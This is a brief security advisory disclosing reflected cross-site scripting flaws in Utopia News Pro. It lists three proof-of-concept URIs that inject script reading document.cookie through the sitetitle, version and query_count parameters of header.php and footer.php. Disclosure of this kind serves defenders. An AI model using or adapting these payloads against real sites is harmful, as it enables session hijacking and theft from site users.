Utopia News Pro Multiple Cross-Site Scripting Vulnerabilities

Utopia News Pro Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

The following proof of concept URI are available:

http://www.example.com/[path]/header.php?sitetitle=</title><script>alert(document.cookie)</script><!--
http://www.example.com/[path]/footer.php?version=<script>alert(document.cookie)</script>
http://www.example.com/[path]/footer.php?query_count=<script>alert(document.cookie)</script>